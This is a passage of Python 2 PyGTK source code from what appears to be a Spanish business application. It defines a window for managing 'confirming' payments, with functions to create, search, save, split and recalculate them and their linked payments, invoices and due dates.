'b_nuevo/clicked': self.crear_nuevo,
'b_actualizar/clicked': self.actualizar_ventana,
'b_guardar/clicked': self.guardar,
'b_borrar/clicked': self.borrar,
'b_buscar/clicked': self.buscar,
'b_add_cobro/clicked': self.add_cobro,
'b_drop_cobro/clicked': self.drop_cobro,
'b_fechar/clicked': self.cambiar_fechar,
'b_fechac/clicked': self.cambiar_fechac,
'tb_pendiente/clicked': self.pendiente,
'b_add_abono/clicked': self.add_abono,
'b_recalcular/clicked': self.recalcular,
'b_split/clicked': self.dividir_confirming,
}
self.add_connections(connections)
self.inicializar_ventana()
if self.objeto == None:
self.ir_a_primero()
else:
self.ir_a(objeto)
gtk.main()
# --------------- Funciones auxiliares ------------------------------
def dividir_confirming(self, boton):
"""
Divide el confirming actual creando uno idéntico pero haciendo
corresponder a cada uno de ellos la mitad del importe total.
Para que coincidan esos importes totales con el contenido del
confirming, duplica también los vencimientos asociados dividiendo
el importe en 2.
"""
if utils.dialogo(titulo = "¿DIVIDIR CONFIRMING?",
texto = "Se procederá a dividir el confirming actual"
" en dos.\nAmbos serán idénticos y tendrán c"
"omo importe total la mitad del importe actu"
"al.\n\n¿Está seguro de dividir el confirmin"
"g?",
padre = self.wids['ventana']):
original = self.objeto
copia = pclases.Confirming(
codigo = original.codigo + " (DUPLICADO)",
fechaRecepcion = original.fechaRecepcion,
fechaCobro = original.fechaCobro,
cantidad = original.cantidad / 2.0,
cobrado = original.cobrado,
observaciones = '\n'.join((original.observaciones,
'Duplicado. Cambie el número de confirming.')),
fechaCobrado = original.fechaCobrado,
procesado = original.procesado,
banco = original.banco)
pclases.Auditoria.nuevo(copia, self.usuario, __file__)
original.cantidad = copia.cantidad
for cobro in original.cobros:
nuevo_cobro = pclases.Cobro(confirming = copia,
facturaVenta = cobro.facturaVenta,
prefactura = cobro.prefactura,
facturaDeAbono = cobro.facturaDeAbono,
cliente = cobro.cliente,
fecha = cobro.fecha,
importe = cobro.importe / 2.0,
observaciones = 'Confirming con fecha ??/??/'
'???? y vencimiento ??/??/??'
'?? (pdte. de cobro)')
pclases.Auditoria.nuevo(nuevo_cobro, self.usuario, __file__)
cobro.importe = nuevo_cobro.importe
factura = cobro.facturaVenta or cobro.prefactura
if len(factura.vencimientosCobro) == 1:
vto_original = factura.vencimientosCobro[0]
vto_copia = pclases.VencimientoCobro(
facturaVenta = vto_original.facturaVenta,
prefactura = vto_original.prefactura,
fecha = vto_original.fecha,
importe = vto_original.importe / 2.0,
observaciones='Duplicado automáticamente '
'por división de confirming.')
pclases.Auditoria.nuevo(vto_copia, self.usuario, __file__)
vto_original.importe = vto_copia.importe
elif len(factura.vencimientosCobro) > 1:
# Hay que determinar el vencimiento a duplicar.
pass
self.actualizar_ventana()
nueva_ventana = Confirmings(copia) # @UnusedVariable
def recalcular(self, boton):
"""
Recalcula el total del confirming y coloca la suma de
los cobros que contiene en el campo correspondiente.
No guarda la cantidad. Eso lo debe hacer el usuario si
está conforme.
"""
confirming = self.objeto
total = 0
if confirming != None:
for c in confirming.cobros:
total += c.importe
self.wids['e_cantidad'].set_text(utils.float2str(total))
def es_diferente(self):
"""
Devuelve True si la información en pantalla es distinta a la
del objeto en memoria.
"""
confirming = self.objeto
if confirming == None:
return False # Si no hay confirming activo, devuelvo que no
# hay cambio respecto a la ventana
condicion = self.wids['e_fechar'].get_text() \
== confirming.fechaRecepcion.strftime('%d/%m/%Y')
buff = self.wids['txt_observaciones'].get_buffer()
condicion = condicion and (buff.get_text(buff.get_start_iter(),
buff.get_end_iter()) == confirming.observaciones)
condicion = condicion and (
(self.wids['e_fechac'].get_text()
== confirming.fechaCobro.strftime('%d/%m/%Y'))
or self.wids['e_fechac'].get_text() == ""
and not confirming.fechaCobro)
condicion = condicion and (
(self.wids['e_fechar'].get_text()
== confirming.fechaRecepcion.strftime('%d/%m/%Y'))
or self.wids['e_fechar'].get_text() == ""
and not confirming.fechaRecepcion)
condicion = condicion and (
self.wids['e_cantidad'].get_text()
== "%s" % (utils.float2str(confirming.cantidad)))
condicion = condicion and (
self.wids['e_codigo'].get_text() == confirming.codigo)
condicion = condicion and (
utils.combo_get_value(self.wids['cbe_banco'])==confirming.bancoID)
return not condicion # Concición verifica que sea igual
def aviso_actualizacion(self):
"""
Muestra una ventana modal con el mensaje de objeto
actualizado.
"""
utils.dialogo_info('ACTUALIZAR',
'El confirming ha sido modificado remotamente.\nD'
'ebe actualizar la información mostrada en pantal'
'la.\nPulse el botón «Actualizar»',
padre = self.wids['ventana'])
self.wids['b_actualizar'].set_sensitive(True)
def inicializar_ventana(self):
"""
Inicializa los controles de la ventana, estableciendo sus
valores por defecto, deshabilitando los innecesarios,
rellenando los combos, formateando el TreeView -si lo hay-...
"""
# Inicialmente no se muestra NADA. Sólo se le deja al
# usuario la opción de buscar o crear nuevo.
self.activar_widgets(False)
self.wids['b_actualizar'].set_sensitive(False)
self.wids['b_guardar'].set_sensitive(False)
self.wids['b_nuevo'].set_sensitive(True)
self.wids['b_buscar'].set_sensitive(True)
cols = (('Factura', 'gobject.TYPE_STRING', False, True, True, None),
('Importe cobrado', 'gobject.TYPE_STRING', True, True, False,
self.cambiar_importe_cobro),
('Fecha vencimiento', 'gobject.TYPE_STRING',
False, True, False, None),
('Importe total de la factura', 'gobject.TYPE_STRING',
False, True, False, None),
('Vencimientos', 'gobject.TYPE_STRING',
False, True, False, None),
('ID', 'gobject.TYPE_INT64', False, False, False, None))
utils.preparar_listview(self.wids['tv_cobros'], cols)
self.colorear_cobros(self.wids['tv_cobros'])
self.wids['tv_cobros'].connect("row-activated", self.abrir_factura)
utils.rellenar_lista(self.wids['cbe_cliente'],
[(c.id, c.nombre) for c in
pclases.Cliente.select(
pclases.Cliente.q.inhabilitado == False,
orderBy="nombre")])
utils.combo_set_from_db(self.wids['cbe_cliente'], -1) # Esto
# quitará el elemento activo del combo.
self.wids['cbe_cliente'].child.set_text("")
def iter_cliente_seleccionado(completion, model, itr = None):
if itr == None: # Si me ha llamado el changed, el itr
# habrá cambiado JUSTO AHORA.
try:
itr = completion.get_active_iter()
except AttributeError:
itr = None
if itr != None:
idcliente = model[itr][0]
utils.combo_set_from_db(self.wids['cbe_cliente'], idcliente,
forced_value = pclases.Cliente.get(idcliente).nombre)
for p in [p for p in self.objeto.cobros if p.cliente == None]:
p.clienteID = idcliente
self.wids['cbe_cliente'].set_sensitive(
len([c for c in self.objeto.cobros if c.cliente != None]) == 0)
self.wids['cbe_cliente'].child.get_completion().connect(
'match-selected', iter_cliente_seleccionado)
self.wids['cbe_cliente'].connect('changed',
iter_cliente_seleccionado,
self.wids['cbe_cliente'].get_model(),
self.wids['cbe_cliente'].get_active_iter())
utils.rellenar_lista(self.wids['cbe_banco'],
[(b.id, b.nombre) for b in
pclases.Banco.select(orderBy = "nombre")])
def colorear_cobros(self, tv):
"""
Colorea los cobros marcando en otro color aquellos
en los que la cantidad cubierta por el confirming (el cobro)
difiera de la cantidad de la factura original.
"""
def cell_func(col, cell, model, itr, numcol):
valor = model[itr][numcol]
if model[itr][1] != model[itr][3]:
cell.set_property("foreground", "red")
else:
cell.set_property("foreground", "black")
cell.set_property("text", valor)
cols = tv.get_columns()
for i in xrange(len(cols)):
column = cols[i]
if i == 1:
cells = column.get_cell_renderers()
for cell in cells:
column.set_cell_data_func(cell, cell_func, i)
def abrir_factura(self, tv, path, view_column):
model = tv.get_model()
idcobro = model[path][-1]
cobro = pclases.Cobro.get(idcobro)
fra = cobro.facturaVenta
if fra != None:
from formularios import facturas_venta
ventanafacturas = facturas_venta.FacturasVenta(fra) # @UnusedVariable
prefra = cobro.prefactura
if prefra != None:
from formularios import prefacturas
ventanafacturas = prefacturas.Prefacturas(prefra) # @UnusedVariable
def cambiar_importe_cobro(self, cell, path, texto):
"""
Cambia el importe del cobro.
"""
model = self.wids['tv_cobros'].get_model()
try:
importe = utils.parse_euro(texto)
except ValueError:
utils.dialogo_info('ERROR EN FORMATO',
'El importe introducido no es correcto.',
padre = self.wids['ventana'])
return
idcobro = model[path][-1]
cobro = pclases.Cobro.get(idcobro)
cobro.importe = importe
cobro.syncUpdate()
model[path][1] = cobro.importe
def activar_widgets(self, s):
"""
Activa o desactiva (sensitive=True/False) todos
los widgets de la ventana que dependan del
objeto mostrado.
Entrada: s debe ser True o False. En todo caso
se evaluará como boolean.
"""
ws = ('hbuttonbox2', 'frame1', 'vbox2')
for w in ws:
self.wids[w].set_sensitive(s)
def ir_a_primero(self):
"""
Hace que el primer registro -si lo hay- de la tabla implicada
en el objeto del formulario sea el objeto activo.
"""
confirming = self.objeto
try:
# Anulo el aviso de actualización del envío que deja de ser activo.
if confirming != None:
confirming.notificador.set_func(lambda : None)
confirming = pclases.Confirming.select(orderBy = "-id")[0]
# Selecciono todos y me quedo con el primero de la lista
confirming.notificador.set_func(self.aviso_actualizacion)
# Activo la notificación
except:
confirming = None
self.objeto = confirming
self.actualizar_ventana()
def refinar_resultados_busqueda(self, resultados):
"""
Muestra en una ventana de resultados todos los
registros de "resultados".
Devuelve el id (primera columna de la ventana
de resultados) de la fila seleccionada o None
si se canceló.
"""
filas_res = []
for r in resultados:
cliente = r.cliente
filas_res.append((r.id,
r.codigo,
cliente != None and cliente.nombre or "",
utils.str_fecha(r.fechaRecepcion),
"%s €" % (utils.float2str(r.cantidad)),
utils.str_fecha(r.fechaCobro),
r.pendiente and "Sí" or "No",
", ".join([c.numfactura for c in r.cobros]),
r.banco and r.banco.nombre or ""))
idconfirming = utils.dialogo_resultado(filas_res,
titulo = 'Seleccione Confirming',
cabeceras = ('ID',
'Número',
'Cliente',
'Fecha recepción',
'Importe',
'Vencimiento',
'Pendiente',
'Facturas',
'Banco'),
padre = self.wids['ventana'])
if idconfirming < 0:
return None
else:
return idconfirming
def escribir_valor(self, widget, valor):
"""
Con respecto al widget: intenta escribir el valor como si
fuera un Entry. Si no lo consigue lo intenta como si fuera
un TextView.
En cuanto al valor, lo convierte en cadena antes de escribirlo.
"""
try:
widget.set_text(str(valor))
except AttributeError: #No tiene el set_text, por tanto no es un Entry.
widget.get_buffer().set_text(valor)
def leer_valor(self, widget):
"""
Intenta leer el valor como si fuera un Entry. Si no lo
consigue lo hace suponiendo que es un TextView.
Devuelve el valor leído _como cadena_.
"""
try:
res = widget.get_text()
except AttributeError:
buff = widget.get_buffer()
res = buff.get_text(buff.get_bounds()[0],
buff.get_bounds()[1])
return res
def rellenar_widgets(self):
"""
Introduce la información del confirming actual
en los widgets.
No se chequea que sea != None, así que
hay que tener cuidado de no llamar a
esta función en ese caso.
"""
confirming = self.objeto
self.wids['e_codigo'].set_text(confirming.codigo)
self.wids['e_fechar'].set_text(
confirming.fechaRecepcion.strftime('%d/%m/%Y'))
self.escribir_valor(self.wids['txt_observaciones'],
confirming.observaciones)
if not confirming.fechaCobro:
self.wids['e_fechac'].set_text('')
else:
self.wids['e_fechac'].set_text(
confirming.fechaCobro.strftime('%d/%m/%Y'))
self.wids['e_cantidad'].set_text(
'%s' % (utils.float2str(confirming.cantidad)))
importe_facturas_cubiertas=sum([c.importe for c in confirming.cobros])
if importe_facturas_cubiertas != confirming.cantidad:
self.wids['e_cantidad'].modify_text(gtk.STATE_NORMAL,
self.wids['e_cantidad'].get_colormap().alloc_color("red"))
else:
self.wids['e_cantidad'].modify_text(gtk.STATE_NORMAL,
self.wids['e_cantidad'].get_colormap().alloc_color("black"))
self.wids['tb_pendiente'].set_active(not confirming.pendiente)
self.show_texto_boton_pendiente()
self.rellenar_cobros()
self.wids['cbe_cliente'].set_sensitive(len(confirming.cobros) == 0)
utils.combo_set_from_db(self.wids['cbe_banco'], confirming.bancoID)
self.wids['l_estado'].set_text("<i>%s</i>"%confirming.get_str_estado())
self.wids['l_estado'].set_use_markup(True)
self.objeto.make_swap()
def show_texto_boton_pendiente(self):
"""
Muestra el texto del botón de pendiente acorde al estado del
confirming.
"""
confirming = self.objeto
if not confirming:
txtbutton = "No vencido"
else:
if self.wids['tb_pendiente'].get_active():
if confirming.fechaCobrado:
if confirming.fechaCobrado < confirming.fechaVencimiento:
txtbutton = "Confirming adelantado"
else:
txtbutton = 'Confirming cobrado'
else:
txtbutton = 'Confirming pendiente o no vencido'
else:
txtbutton = 'Confirming pendiente o no vencido'
self.wids['tb_pendiente'].set_label(txtbutton)
def rellenar_cobros(self):
model = self.wids['tv_cobros'].get_model()
model.clear()
if self.objeto.cobros != []:
utils.combo_set_from_db(self.wids['cbe_cliente'],
self.objeto.cobros[0].cliente.id,
forced_value = self.objeto.cobros[0].cliente.nombre)
for c in self.objeto.cobros:
if c.facturaVentaID != None:
importe_factura = c.facturaVenta.importeTotal
vencimientos = "(%d) "%(len(c.facturaVenta.vencimientosCobro))
vencimientos += "; ".join(
["%s: %s €" % (utils.str_fecha(v.fecha),
utils.float2str(v.importe))
for v in c.facturaVenta.vencimientosCobro])
elif c.prefacturaID != None:
importe_factura = c.prefactura.importeTotal
vencimientos = "(%d) " % (len(c.prefactura.vencimientosCobro))
vencimientos += "; ".join(["%s: %s €" % (
utils.str_fecha(v.fecha),
utils.float2str(v.importe))
for v in c.prefactura.vencimientosCobro])
elif c.facturaDeAbonoID != None:
importe_factura = c.facturaDeAbono.importeTotal
vencimientos = ""
model.append((c.numfactura,
"%s €" % (utils.float2str(c.importe)),
utils.str_fecha(c.fecha),
"%s €" % (utils.float2str(importe_factura)),
vencimientos,
c.id))
# --------------- Manejadores de eventos ----------------------------
def crear_nuevo(self, widget):
"""
Función callback del botón b_nuevo.
Pide los datos básicos para crear un nuevo objeto.
Una vez insertado en la BD hay que hacerlo activo
en la ventana para que puedan ser editados el resto
de campos que no se hayan pedido aquí.
"""
confirming = self.objeto
if confirming != None:
confirming.notificador.set_func(lambda : None)
self.objeto = pclases.Confirming(fechaCobro = mx.DateTime.localtime()
+ (mx.DateTime.oneDay * 60),
cantidad = 0,
cobrado = -1,
fechaRecepcion = mx.DateTime.localtime(),
fechaCobrado = None,
procesado = False,
banco = None)
confirming = self.objeto
pclases.Auditoria.nuevo(confirming, self.usuario, __file__)
confirming.notificador.set_func(self.aviso_actualizacion)
utils.dialogo_info(titulo = 'CONFIRMING CREADO',
texto = 'No olvide relacionar las facturas que '
'cubre el efecto.',
padre = self.wids['ventana'])
utils.combo_set_from_db(self.wids['cbe_cliente'], -1) # Esto quitará
# el elemento activo del combo.
self.wids['cbe_cliente'].child.set_text("")
self.actualizar_ventana()
def buscar(self, widget):
"""
Muestra una ventana de búsqueda y a continuación los
resultados. El objeto seleccionado se hará activo
en la ventana a no ser que se pulse en Cancelar en
la ventana de resultados.
"""
confirming = self.objeto
a_buscar = utils.dialogo_entrada(titulo = "BUSCAR CONFIRMING",
texto = "Introduzca número, fecha del confirming o "
"número de factura:",
padre = self.wids['ventana'])
if a_buscar != None:
if a_buscar.count('/') == 2:
fecha = utils.parse_fecha(a_buscar)
resultados = pclases.Confirming.select(pclases.OR(
pclases.Confirming.q.fechaRecepcion == fecha,
pclases.Confirming.q.fechaCobro == fecha))
lon = resultados.count()
else:
resultados = pclases.Confirming.select(
pclases.Confirming.q.codigo.contains(a_buscar))
resultados = list(resultados)
facturas = pclases.FacturaVenta.select(
pclases.FacturaVenta.q.numfactura.contains(a_buscar))
prefacturas = pclases.Prefactura.select(
pclases.Prefactura.q.numfactura.contains(a_buscar))
if facturas.count() + prefacturas.count() > 0:
for f in facturas:
for c in f.cobros:
if (c.confirming != None and c.confirming
not in resultados):
resultados.append(c.confirming)
for f in prefacturas:
for c in f.cobros:
if (c.confirming != None and c.confirming
not in resultados):
resultados.append(c.confirming)
lon = len(resultados)
if lon > 1:
## Refinar los resultados
idconfirming = self.refinar_resultados_busqueda(resultados)
if idconfirming == None:
return
resultados = [pclases.Confirming.get(idconfirming)]
elif lon < 1:
## Sin resultados de búsqueda
utils.dialogo_info('SIN RESULTADOS',
'La búsqueda no produjo resultados.\nPruebe a cambiar el'
' texto buscado o déjelo en blanco para ver una lista co'
'mpleta.\n(Atención: Ver la lista completa puede resulta'
'r lento si el número de elementos es muy alto)',
padre = self.wids['ventana'])
return
## Un único resultado
# Primero anulo la función de actualización
if confirming != None:
confirming.notificador.set_func(lambda : None)
# Pongo el objeto como actual
confirming = resultados[0]
# Y activo la función de notificación:
confirming.notificador.set_func(self.aviso_actualizacion)
self.objeto = confirming
self.actualizar_ventana()
def guardar(self, widget = None):
"""
Guarda el contenido de los entry y demás widgets de entrada
de datos en el objeto y lo sincroniza con la BD.
"""
confirming = self.objeto
codigo = self.wids['e_codigo'].get_text()
try:
fechar = utils.parse_fecha(self.wids['e_fechar'].get_text())
except:
utils.dialogo_info(titulo = "ERROR EN FORMATO DE FECHA",
texto = "El texto %s no es correcto o no repr"
"esenta una fecha" % (
self.wids['e_fechar'].get_text()),
padre = self.wids['ventana'])
fechar = self.objeto.fechaRecepcion
try:
fechac = utils.parse_fecha(self.wids['e_fechac'].get_text())
except:
utils.dialogo_info(titulo = "ERROR EN FORMATO DE FECHA",
texto = "El texto %s no es correcto o no representa una "
"fecha" % self.wids['e_fechar'].get_text(),
padre = self.wids['ventana'])
fechac = self.objeto.fechaCobro
buff = self.wids['txt_observaciones'].get_buffer()
observaciones = buff.get_text(buff.get_start_iter(),
buff.get_end_iter())
try:
cantidad=float(self.wids['e_cantidad'].get_text().replace("€", ""))
except:
utils.dialogo_info(titulo = "ERROR EN FORMATO NUMÉRICO",
texto = "El texto %s no es correcto o no representa un "
"número" % self.wids['e_cantidad'].get_text(),
padre = self.wids['ventana'])
cantidad = self.objeto.cantidad
self.objeto.fechaRecepcion = fechar
self.objeto.fechaCobro = fechac
self.objeto.observaciones = observaciones
self.objeto.cantidad = cantidad
self.objeto.codigo = codigo
self.objeto.bancoID = utils.combo_get_value(self.wids['cbe_banco'])
# Fuerzo la actualización de la BD y no espero a que SQLObject lo
# haga por mí:
confirming.syncUpdate()
# Vuelvo a activar el notificador
confirming.notificador.set_func(self.aviso_actualizacion)
self.actualizar_ventana()
self.wids['b_guardar'].set_sensitive(False)
def pendiente(self, w):
self.objeto.procesado = True # Modifica manualmente, no procesar.
if w.get_active():
self.objeto.cobrado = self.objeto.cantidad
# w.set_label('Confirming cobrado')
self.objeto.fechaCobrado = mx.DateTime.today()
self.objeto.syncUpdate()
for c in self.objeto.cobros:
c.fecha = self.objeto.fechaCobrado
c.syncUpdate()
else:
self.objeto.cobrado = -1
# w.set_label('Confirming pendiente')
self.objeto.fechaCobrado = None
self.objeto.syncUpdate()
for c in self.objeto.cobros:
c.fecha = self.objeto.fechaVencimiento
c.syncUpdate()
self.show_texto_boton_pendiente()
self.guardar()
self.objeto.sync()
self.objeto.make_swap()
w.set_active(w.get_active())
self.actualizar_ventana()
def refinar_resultados_busqueda_cliente(self, resultados):
"""
Muestra en una ventana de resultados todos los
registros de "resultados".
Devuelve el id (primera columna de la ventana
de resultados) de la fila seleccionada o None
si se canceló.
"""
filas_res = []
for r in resultados:
filas_res.append((r.id, r.nombre, r.cif))
idcliente = utils.dialogo_resultado(filas_res,
titulo = 'Seleccione Cliente',
cabeceras = ('ID Interno', 'Nombre', 'CIF'),
padre = self.wids['ventana'])
if idcliente < 0:
return None
else:
return idcliente
def buscar_cliente(self, include_inhabilitados = False):
"""
Muestra una ventana de búsqueda y a continuación los
resultados. El objeto seleccionado se hará activo
en la ventana a no ser que se pulse en Cancelar en
la ventana de resultados.
"""
cliente = None
a_buscar = utils.dialogo_entrada(titulo = "CIF",
texto = "Introduzca nombre o CIF del cliente:",
padre = self.wids['ventana'])
if a_buscar != None:
criterio = pclases.OR(pclases.Cliente.q.nombre.contains(a_buscar),
pclases.Cliente.q.cif.contains(a_buscar))
if not include_inhabilitados:
resultados = pclases.Cliente.select(pclases.AND(
pclases.Cliente.q.inhabilitado == False,
criterio))
else:
resultados = pclases.Cliente.select(criterio)
if resultados.count() > 1:
## Refinar los resultados
idcliente=self.refinar_resultados_busqueda_cliente(resultados)
if idcliente == None:
return
resultados = [pclases.Cliente.get(idcliente)]
elif resultados.count() < 1:
## Sin resultados de búsqueda
utils.dialogo_info('SIN RESULTADOS',
'La búsqueda no produjo resultados.\nPruebe a cambiar el'
' texto buscado o déjelo en blanco para ver una lista co'
'mpleta.\n(Atención: Ver la lista completa puede resulta'
'r lento si el número de elementos es muy alto)',
padre = self.wids['ventana'])
return
## Un único resultado
cliente = resultados[0]
return cliente
def refinar_resultados_busqueda_factura(self, resultados):
"""
Muestra en una ventana de resultados todos los
registros de "resultados".
Devuelve el id (primera columna de la ventana
de resultados) de la fila seleccionada o None
si se canceló.
"""
filas_res = []
for r in resultados:
nombrecliente = [r.cliente and r.cliente.nombre or ''][0]
filas_res.append((r.id, r.numfactura, utils.str_fecha(r.fecha),
nombrecliente))
idsfactura = utils.dialogo_resultado(filas_res,
titulo = 'Seleccione factura',
cabeceras = ('ID', 'Número de factura', 'Fecha', 'Cliente'),
padre = self.wids['ventana'],
multi = True)
if idsfactura < 0 or idsfactura == [-1]:
return None
else:
return idsfactura
def buscar_factura(self, cliente):
fras = None
numfra = utils.dialogo_entrada(titulo = "NÚMERO DE FACTURA",
texto = "Introduzca el número de factura",
padre = self.wids['ventana'])
if numfra != None:
fras = [("FV:%d" % f.id, f.numfactura, utils.str_fecha(f.fecha),
"%s €" % (utils.float2str(f.importeTotal)))
for f in cliente.facturasVenta
if numfra.upper() in f.numfactura.upper()]
fras += [("PF:%d" % f.id, f.numfactura, utils.str_fecha(f.fecha),
"%s €" % (utils.float2str(f.importeTotal)))
for f in cliente.prefacturas
if numfra.upper() in f.numfactura.upper()]
if len(fras) > 1:
idsfra = utils.dialogo_resultado(fras,
titulo = "SELECCIONE FACTURA",
cabeceras = ('ID', 'Número de factura',
'Fecha', 'Importe total'),
padre = self.wids['ventana'],
multi = True)
elif len(fras) == 1:
idsfra = [fras[0][0]]
else:
utils.dialogo_info(titulo = "FACTURA NO ENCONTRADA",
texto = "No se encontró ninguna factura.",
padre = self.wids['ventana'])
idsfra = []
fras = []
if len(idsfra) > 0 and idsfra[0] != -1:
for tipo, ide in [f.split(":") for f in idsfra]:
idfra = int(ide)
if tipo == "FV":
fras.append(pclases.FacturaVenta.get(idfra))
elif tipo == "PF":
fras.append(pclases.Prefactura.get(idfra))
return fras
def preparar_vencimientos(self, factura):
"""
A partir de los vencimientos y pagos asociados a la
factura construye una lista de listas de la forma:
[[vencimiento, vencimiento_estimado, pago],
[vencimiento, vencimiento_estimado, pago],
...]
Cualquiera de los tres objetos puede ser None en
alguna fila donde no haya, por ejemplo, una estimación
o un pago para un vencimiento.
La lista se construye emparejando por proximidad de
fechas entre los tres grupos (vto., vto. estimado y
pago) y no se tiene en cuenta ningún otro criterio.
"""
res = []
vtos = [v for v in factura.vencimientosCobro]
ests = [v for v in factura.estimacionesCobro]
pags = factura.cobros
mas_larga = [l for l in (vtos, ests, pags)
if len(l)==max(len(vtos), len(ests), len(pags))][0]
if len(mas_larga) == 0: return []
for i in xrange(len(mas_larga)): # @UnusedVariable
res.append([None, None, None])
def comp(v1, v2):
if v1.fecha < v2.fecha: return -1
if v1.fecha > v2.fecha: return 1
return 0
def distancia(v1, v2):
return abs(v1.fecha - v2.fecha)
def lugar(v):
if isinstance(v, pclases.VencimientoCobro):
return 0
elif isinstance(v, pclases.EstimacionCobro):
return 1
else:
return 2
resto = [vtos, ests, pags]
resto.remove(mas_larga)
mas_larga.sort(comp)
pos = 0
for item in mas_larga:
res [pos][lugar(item)] = item
pos += 1
for lista in resto:
mlc = mas_larga[:]
lista.sort(comp)
while lista:
item2 = lista.pop()
mindist = distancia(item2, mlc[0])
sol = mlc[0]
for item1 in mlc:
if distancia(item1, item2) < mindist:
sol = item1
mindist = distancia(item1, item2)
res[mas_larga.index(sol)][lugar(item2)] = item2
mlc.remove(sol)
return res
def buscar_vencimiento(self, factura):
vtos_full = self.preparar_vencimientos(factura)
if len(vtos_full) == 0:
utils.dialogo_info(titulo = "FACTURA SIN VENCIMIENTOS",
texto = "La factura %s no tiene vencimientos.\nPara evitar in"
"coherencias, todo cobro o confirming debe correspond"
"erse con un vencimiento.\nCree los vencimientos ante"
"s de relacionar la factura con un confirming." % (
factura.numfactura),
padre = self.wids['ventana'])
return None
vtos = [(v[0].id,
utils.str_fecha(v[0].fecha),
"%s €" % (utils.float2str(v[0].importe)),
v[0].observaciones,
v[2] != None
and v[2].confirmingID != None
and v[2].confirming.codigo
or "")
for v in vtos_full if v[0] != None] #\
# if v[2] == None] # El vencimiento no tiene cobro "asociado".
if len(vtos) > 1:
idvto = utils.dialogo_resultado(vtos,
titulo = "SELECCIONE VENCIMIENTO",
cabeceras = ('ID', 'Fecha', 'Importe',
'Observaciones',
'Cubierto en confirming'),
padre = self.wids['ventana'])
elif len(vtos) == 1:
idvto = vtos[0][0]
else:
utils.dialogo_info(titulo = "FACTURA SIN VENCIMIENTOS",
texto = "La factura no tiene vencimientos o ya han sido "
"cubiertos en otro confirming.",
padre = self.wids['ventana'])
idvto = -1
if idvto > 0:
vto = pclases.VencimientoCobro.get(idvto)
else:
vto = None
return vto
def add_cobro(self, b):
confirming = self.objeto
idcliente = utils.combo_get_value(self.wids['cbe_cliente'])
if idcliente > 0:
cliente = pclases.Cliente.get(idcliente)
else:
cliente = self.buscar_cliente()
if cliente == None:
return
facturas = self.buscar_factura(cliente)
if facturas == None:
return
for factura in facturas:
if (factura.id in [c.facturaVentaID or c.prefacturaID
for c in self.objeto.cobros]
and len(factura.vencimientosCobro) < 2):
utils.dialogo_info(titulo = "FACTURA YA INCLUIDA",
texto = "La factura %s ya ha sido incluida en este confi"
"rming." % (factura.numfactura),
padre = self.wids['ventana'])
continue
# TODO: No controlo que no se pueda pagar el mismo vencimiento
# de la misma factura en dos confirmings diferentes.
vencimiento = self.buscar_vencimiento(factura)
if vencimiento == None:
continue
antes = sum([c.importe for c in confirming.cobros])
if antes == confirming.cantidad:
actualizar_cantidad = True # Como el importe es la suma de
# los cobros, el nuevo que añado ahora tiene que
# actualizar la cantidad.
# Si no fuera así (el importe es distinto a la suma de
# los cobros) es que se ha introducido a mano y por tanto
# debo respetarlo.
else:
actualizar_cantidad = False
observaciones = "Confirming %s con fecha %s y vencimiento %s" % (
self.objeto.codigo,
utils.str_fecha(self.objeto.fechaRecepcion),
utils.str_fecha(self.objeto.fechaCobro))
if vencimiento.facturaVenta:
cliente = vencimiento.facturaVenta.cliente
elif vencimiento.prefactura:
cliente = vencimiento.prefactura.cliente
else:
cliente = None
cobro = pclases.Cobro(facturaVenta = vencimiento.facturaVenta,
prefactura = vencimiento.prefactura,
confirming = self.objeto,
fecha = vencimiento.fecha,
importe = vencimiento.importe,
observaciones = observaciones,
facturaDeAbono = None,
cliente = cliente)
pclases.Auditoria.nuevo(cobro, self.usuario, __file__)
if actualizar_cantidad:
if confirming.cobrado == confirming.cantidad:
confirming.cobrado = sum([c.importe
for c in confirming.cobros])
confirming.cantidad = confirming.cobrado
else:
confirming.cantidad = sum([c.importe
for c in confirming.cobros])
self.actualizar_ventana()
def add_abono(self, boton):
"""
Añade un "cobro" de una factura de abono (cobro con cantidad
negativa) al confirming de cobro actual.
"""
confirming = self.objeto
idcliente = utils.combo_get_value(self.wids['cbe_cliente'])
if idcliente > 0:
cliente = pclases.Cliente.get(idcliente)
else:
cliente = self.buscar_cliente()
if cliente == None:
return
frabono = self.buscar_factura_de_abono(cliente)
if frabono == None:
return
antes = sum([c.importe for c in confirming.cobros])
observaciones = "Confirming %s con fecha %s y vencimiento %s" % (
self.objeto.codigo,
utils.str_fecha(self.objeto.fechaRecepcion),
utils.str_fecha(self.objeto.fechaCobro))
c = pclases.Cobro(facturaVenta = None,
confirming = self.objeto,
fecha = frabono.fecha,
importe = frabono.importeTotal,
observaciones = observaciones,
facturaDeAbono = frabono,
cliente = frabono and frabono.cliente or None)
pclases.Auditoria.nuevo(c, self.usuario, __file__)
if antes == confirming.cantidad:
actualizar_cantidad = True # Como el importe es la suma de los
# cobros, el nuevo que añado ahora tiene que actualizar la
# cantidad.
# Si no fuera así (el importe es distinto a la suma de los
# cobros) es que se ha introducido a mano y por tanto debo
# respetarlo.
else:
actualizar_cantidad = False
if actualizar_cantidad:
if confirming.cobrado == confirming.cantidad:
confirming.cobrado = sum([c.importe
for c in confirming.cobros])
confirming.cantidad = confirming.cobrado
else:
confirming.cantidad = sum([c.importe
for c in confirming.cobros])
self.actualizar_ventana()
def buscar_factura_de_abono(self, cliente):
"""
Busca, a través de diálogos, facturas de abono del cliente
recibido.
PRECONDICIÓN: cliente no puede ser None.
"""
frabono = None
numabono = utils.dialogo_entrada(
titulo = "NÚMERO DE FACTURA DE ABONO",
texto = "Introduzca el número de la factura de abono "
"que busca:",
padre = self.wids['ventana'])
if numabono != None:
abonos = pclases.Abono.select(
pclases.Abono.q.numabono.contains(numabono))
if abonos.count() == 0:
utils.dialogo_info(titulo = "ABONO NO ENCONTRADO",
texto = "Factura con número de abono %s no encontrada." % (
numabono),
padre = self.wids['ventana'])
elif abonos.count() == 1:
abono = abonos[0]
frabono = abono.facturaDeAbono
if frabono == None:
utils.dialogo_info(titulo = "ABONO SIN FACTURAR",
texto = "El abono %s no ha generado factura de abono"
".\n\n\n Si el abono está completo, genere "
"la factura desde la ventana de abonos y vue"
"lva a intentarlo." % (abono.numabono),
padre = self.wids['ventana'])
else:
abono = self.refinar_busqueda_abonos(abonos)
if abono != None:
frabono = abono.facturaDeAbono
if frabono == None:
utils.dialogo_info(titulo = "ABONO SIN FACTURAR",
texto = "El abono %s no ha generado factura de "
"abono.\n\n\n Si el abono está complet"
"o, genere la factura desde la ventana "
"de abonos y vuelva a intentarlo." % (
abono.numabono),
padre = self.wids['ventana'])
return frabono
